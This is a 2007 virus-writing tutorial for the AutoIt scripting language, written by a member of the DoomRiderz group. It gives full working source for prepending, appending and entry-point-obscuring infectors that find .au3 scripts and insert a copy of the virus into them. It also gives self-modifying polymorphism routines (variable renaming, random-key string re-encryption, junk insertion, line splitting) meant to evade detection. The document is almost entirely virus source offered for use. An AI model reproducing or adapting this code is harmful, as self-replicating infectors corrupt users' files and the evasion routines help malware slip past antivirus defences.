AutoIt Virus Writing Guide

Genetix[DoomRiderz]
JAN-2007

Introduction:

* About AutoIt

Infections:

* Prepender
* Appender
* EPO

Polymorphism:

* Variable changing
* Randomized String Encryption
* Adding trash
* Breaking lines (Possibly New method)

Outroduction:

* Credits!....

++++++++++++++++++++++++++++++++++++
++++++++++About AutoIt+++++++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

AutoIt v3 is a freeware BASIC-like scripting language designed for automating

the Windows GUI and general scripting.
It uses a combination of simulated keystrokes, mouse movement and
window/control manipulation in order to automate
tasks in a way not possible or reliable with other languages (e.g. VBScript
and SendKeys). AutoIt is also very small,

self-contained and will run on 95, 98, ME, NT4, 2000, XP & 2003 out of the box
with no annoying "runtimes" required!
You can even make compiled executable scripts that can run without AutoIt
being installed!

AutoIt was initially designed for PC 'roll out' situations to reliably

configure thousands of PCs, but with the arrival
of v3 it has become a powerful language able to cope with most scripting
needs.

this is from the AutoIt website..I'm lazy! see

http://www.hiddensoft.com/autoit3/

So anyway my opinion it's just ANOTHER script language and nobody serious
about virus writing cares about these things
but for me it's all about fun and enjoying youself so just do w/e you enjoy..
I enjoyed this so maybe someone else will
too.

++++++++++++++++++++++++++++++++++++
+++++++++++++Prepender+++++++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

;Genetix[DoomRiderz]

$self=@ScriptName
;get self name
$line=""
$virus=""
$readhost=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
;read line
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";endvirus") then
ExitLoop
;exit at end of the virus code
EndIf
$virus = $virus & @CRLF & $line
;build virus body
Wend
FileClose($me)

$search = FileFindFirstFile("*.au3")
;find AutoIt files
If $search = -1 Then
Exit
;exit no files
EndIf

While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
;same exit if no files
$host = FileOpen($file, 0)
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($file))
;read entire file into variable
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;make sure its not already infected
$InsertVirus = FileOpen($file,2)
FileWriteline($InsertVirus, _
$virus & @CRLF ";endvirus" & @CRLF & $readhost)
;write virus before victims code (prepend)
FileClose($InsertVirus)
 EndIf
Wend
;continue searching

;endvirus

++++++++++++++++++++++++++++++++++++
+++++++++++++Appender++++++++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

;start
;Genetix[DoomRiderz]

$self=@ScriptName
;get script name
$line=""
$virus=""
$readhost=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
If @error = -1 Then ExitLoop
;exit if EOF
if ($line = ";start") then
;find beginning of virus code
ExitLoop
;exit loop when found
EndIf
Wend
while 1
$line = FileReadLine($me)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";endvirus") then
ExitLoop
;Stop reading at end of virus
EndIf
$virus = $virus & @CRLF & $line
;build the virus
Wend
FileClose($me)

$search = FileFindFirstFile("*.au3")
;search for AutoIt files
If $search = -1 Then
Exit
;exit if nothing is there
EndIf
While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
 $host = FileOpen($file, 0)
;open victim
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($file))
;read the entire host code
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;make sure it isnt infected already
$InsertVirus = FileOpen($file,2)
FileWriteline($InsertVirus, _
$readhost & @CRLF & ";start" & @CRLF & $virus & @CRLF & ";endvirus")
;append the virus
FileClose($InsertVirus)
EndIf
Wend
;continue searching

;endvirus

++++++++++++++++++++++++++++++++++++
++++++++++++++++EPO++++++++++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

;start
;Genetix[DoomRiderz]
$self=@ScriptName
;get script name

;setup some variables, this needs alot!

$line=""
$begin=""
$virbody=""
$virus=""
$nextpart=""
$readhost=""
$complete=""
$me = FileOpen($self, 0)
;open itself
while 1
;loop until ExitLoop do us part
$line = FileReadLine($me)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";start") then
ExitLoop
;stop, beginning of the virus is found
EndIf
Wend
while 1
$line = FileReadLine($me)
;read 1 line perl loop
If @error = -1 Then ExitLoop
;yea..
if StringMid($line, 1, 9) = ";endvirus" Then
ExitLoop
;stop, end of the virus is found
EndIf
$virbody = $virbody & @CRLF & $line
;build the virus body
Wend
FileClose($me)
;byez
$virus = ";start" & @CRLF & $virbody & @CRLF & ";endvirus"
;virus stored in $virus

$search = FileFindFirstFile("*.au3")
;find files
If $search = -1 Then
Exit
;exit if nothing is there
EndIf

While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
;again.. nvm
$host = FileOpen($file, 0)
;open any au3 file
If $host = -1 then ExitLoop
$readhost = FileRead($host, FileGetSize($file))
;read it entire host into $readhost
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;check if its already infected
if StringInStr($readhost, "EndFunc") <> False Then
;can it use EPO on this file?
$target = FileOpen($file, 0)
;open up the victim file again
while 1
;loopy
$line = FileReadLine($target)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = "EndFunc") then
;find a home for the virus
ExitLoop
;exit loop when thats found
EndIf
$begin = $begin & @CRLF & $line
;append lines from start to "EndFunc"
Wend
while 1
$line = FileReadLine($target)
;read line's again
If @error = -1 Then ExitLoop
;exit EOF
 $nextpart = $nextpart & @CRLF & $line
;read from "EndFunc" to EOF
Wend
FileClose($target)

;here the virus gets 2 parts of the victim. First is everything

until "EndFunk" 2nd is everything after it
;so it has these stored in 2 different variables.
;now we can insert the virus into the middle! hostpart1 + virus +
hostpart2. easy!

$complete = $begin & @CRLF & $virus & @CRLF & "EndFunc" & @CRLF &
$nextpart ;join everything together
$InsertVirus = FileOpen($file,2)
;open the victim for writing
FileWriteline($InsertVirus, $complete)
;insert the virus
FileClose($InsertVirus)
EndIf
EndIf
Wend
;more searching!

;endvirus

++++++++++++++++++++++++++++++++++++
+++++Variable name changing++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

#include <Array.au3>
;include this to use arrays in AutoIt

Dim $avArray
;define array
$avArray = _ArrayCreate("avArray", "self", "host", "readhost", _
"rewrite", "newvalues", "var")
;setup variables to replace

$self=@ScriptName
;get the script name
$readhost=""
$host = FileOpen($self, 0)
;open self
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($self))
;read entir virus into variable
FileClose($host)

$newvalues=""
FOR $i=0 to UBound($avArray) - 1
;loop through each element in the array
$var=""
 for $x=1 to random(6,12,1)
$var = $var & Chr(random(97,122,1))
;create a new random sized variable

;this can be improved alot!

next
$readhost = StringReplace($readhost, $avArray[$i], $var)
;replace with new variable
Next

$rewrite = FileOpen($self,2)
FileWrite($rewrite, $readhost)
;rewrite with new code
FileClose($rewrite)

++++++++++++++++++++++++++++++++++++
++++Randomized String Encryption+++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

$self=@ScriptName
;get the script name
$readhost=""
$host = FileOpen($self, 0)
If $host = -1 then ExitLoop
$readhost = FileRead($host, FileGetSize($self))
;read everything into the variable
FileClose($host)
$code="пÌÂÍËÇØÃÂ~ÑÒÐÇÌÅ~ÃÌÁÐ×ÎÒÇÍÌ94"
;the encrypted string with key appended
$original=$code
;original code
$key=StringMid($code, stringlen($code)-1, stringlen($code))
;get the decryption key
$decrypt=""
$de=""
For $i=1 to StringLen($code)
$de = Asc(StringMid($code, $i, 1)) - $key
;decrypt using key
$decrypt = $decrypt & chr($de)
Next
$mycode=StringMid($decrypt, 1, stringlen($decrypt)-2)
;remove old key
MsgBox(0, "", $mycode)
;good for debugging
$rndkey = Random(10,99,1)
;get a new random key
$str=""
$en=""
For $i=1 to StringLen($mycode)
$str = Asc(StringMid($mycode, $i, 1)) + $rndkey
;encrypt with new key
$en = $en & chr($str)
Next
$new = StringReplace($code, $code, $en) & $rndkey
;replace old encrypted string with new
$newstr=StringReplace($readhost, $original, $new)
;replace it in the virus code
$replace = FileOpen($self,2)
FileWrite($replace, $newstr)
;complete!
FileClose($replace)

actually the idea is to encrypt the virus body so it changes like polymorphism
while also being encrypted.
but this is good for an example i guess..

++++++++++++++++++++++++++++++++++++
++++++++Adding Trash to code+++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

$self=@ScriptName
;get self name
$line=""
$virus=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
;read line
If @error = -1 Then ExitLoop
;exit EOF
if random(1,2,1) = 2 then
;should it insert trash here?
$trash=""
For $i = 1 to random(30,100,1)
;random size 30 to 100 cheracters
$trash=$trash & chr(random(50,97,1))
;generate trash
next
$line=$line & @CRLF & ";" & $trash
;insert trash
EndIf
If StringMid($line,1,1) <> ";" then
$virus = $virus & @CRLF & $line
;build the new virus body
EndIf
Wend
FileClose($me)

$rewrite = FileOpen($self,2)
FileWrite($rewrite, $virus)
;rewrite with new code
FileClose($rewrite)

++++++++++++++++++++++++++++++++++++
+++++++++++Breaking Lines++++++++++
+-----------------------------------------------------------------------------
---------
++++++++++++++++++++++++++++++++++++

I'm gussing you've not seen this method before? but if so then here it is
again.

$curline=""
$rem=""
$restore=""
$NewCode=""
$me = FileOpen(@ScriptName, 0)
;open self for reading
while 1
$curline=FileReadLine($me)
;read the first line
If @error = -1 Then ExitLoop
;exit at EOF
FOR $i = 1 to 20
;some things i just cant explain!
IF StringInStr($curline, chr(95)) then
;check if there is an underscore in this line
$rem = stringmid($curline, 1, StringInStr($curline, chr(95)) - 1)
;remove the underscore
$restore = $rem & FileReadLine($me)
;join the line back together
$curline = $restore
;set curline back to its normal self
ENDIF
NEXT

$curline = DoSplit($curline)
;call function to do the line splitting
$NewCode = $NewCode & @CRLF & $curline
;build the new code
wend
FileClose($me)

$rewrite = FileOpen(@ScriptName, 2)
;open self for writing
FileWrite($rewrite, $NewCode)
;rewrite with new code
FileClose($rewrite)
;close.

Func DoSplit($line)
;entry point of splitting function
DIM $pos,$pr1,$pr2,$add,$m=""
;setup some variables
FOR $i = 1 to stringlen($line)
;loop through the line
$m = stringmid($line, $i, 1)
;get the current character
IF $m = chr(44) OR $m = chr(61) OR $m = chr(38) then
;check if its anything we can use
$pr1 = stringmid($line, 1, $i)
;get the line from start to pos of $m
$pr2 = stringmid($line, $i+1, stringlen($line))
;other half from $m to end of line
IF Random(1,2,1) = 2 THEN $line = $pr1 & " " & chr(95) & @CRLF &
$pr2 ;if rnd is 2 then split the line into 2

parts
ENDIF
NEXT
Return $line
;return the new line
EndFunc

;here is an example of what this method can do:

;a line of code can look like this:
stringmid($curline, 1, StringInStr($curline, chr(95)) - 1)
;it can also look like this
stringmid($curline, 1, _
StringInStr($curline, chr(95)) - 1)
;or this:
stringmid($curline, _
1, StringInStr($curline, _
chr(95)) - 1)
;and so on..

so each time the code is executed it will add a continuation character "_" in
random locations only if
this location supports a contuniation.. anything after these characters (. ,
&) will allow an underscore "_".
Splitting 1 line into 2 parts or more.. or join them back to form a single
line.. kinda really simple stuff!
You should try this to understand it better, it's easy to rewrite into VBS and
everyone knows vbs dont they?

------------------------------------------------------------------------------
-------------------------------------------

CREDITS!
Kefi - im still awaiting an email from you!
retr0 - BUZZ!
free0n - puts dances around a lamb pole :p
synge - i forgive you for your evil deeds.
slagehammer - thx for all the asm sources it's just what i needed! yays!
jmp dr3f
dr3f: mov irc,[you]
And hello's to everyone in DoomRiderz and anyone else missing, i just want to
get this over with!

ps:
i had this strange idea of polymorphism of a kind.. encrypting/decrypting
random lines.. i had some success but then
got busy with "real life" (yes synge i have 1 :p) so someone else can try this
if they think it's worth it.

Thats all hope you enjoyed!

byez!